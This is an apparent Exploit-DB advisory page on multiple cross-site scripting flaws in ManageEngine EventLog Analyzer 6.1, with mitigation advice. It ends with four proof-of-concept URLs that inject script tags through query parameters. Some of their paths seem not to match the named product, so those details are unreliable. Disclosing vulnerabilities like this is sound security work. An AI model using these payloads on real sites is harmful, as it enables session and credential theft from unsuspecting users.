Cross-Site Scripting Vulnerabilities in ManageEngine EventLog Analyzer

vendor:

EventLog Analyzer

by:

Unknown

7.5

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: EventLog Analyzer

Affected Version From: 6.1

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:manageengine:eventlog_analyzer:6.1

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

Cross-Site Scripting Vulnerabilities in ManageEngine EventLog Analyzer

Multiple cross-site scripting vulnerabilities exist in ManageEngine EventLog Analyzer, allowing an attacker to execute arbitrary script code in the browser of a user visiting the affected site. This can lead to the theft of authentication credentials and enable further attacks.

Mitigation:

Ensure that user-supplied input is properly sanitized to prevent script code execution. Update to the latest version of ManageEngine EventLog Analyzer to mitigate these vulnerabilities.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45334/info

ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected. 

https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E


https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E